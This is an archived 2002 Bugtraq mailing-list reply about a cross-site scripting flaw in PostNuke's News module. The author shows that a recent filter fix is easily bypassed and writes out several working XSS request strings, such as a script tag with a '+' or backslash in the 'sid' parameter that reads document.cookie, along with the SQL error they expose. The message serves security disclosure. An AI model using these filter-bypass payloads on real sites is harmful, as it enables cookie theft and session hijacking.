[27262] in bugtraq
Re: Postnuke XSS fixed
daemon@ATHENA.MIT.EDU (Daniel Woods)
Wed Oct 2 18:52:31 2002
Date: Wed, 2 Oct 2002 10:09:33 -0600 (MDT)
From: Daniel Woods <dwoods@ucalgary.ca>
To: bugtraq@securityfocus.com
In-Reply-To: <20021002041021.1E4EA3ABE@sitemail.everyone.net>
Message-ID: <Pine.A41.4.44.0210021005060.36474-100000@acs4.acs.ucalgary.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Humm!
> on 26th Sep the following url:
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
> used to give Alert PopUp and
> Error:
> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
> at line 23
>
> now it gives:
> Sorry - $HTTP_GET_VARS contains javascript...
>
> Prompt fix by PostNuke team, great work Keep it up! :)
Not so fast on the praise :(
It only took me a couple of workarounds to find ways to bypass the check.
http://news.postnuke.com/modules.php
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
Using the request...
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message
And using the request...
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
Thanks... Dan.
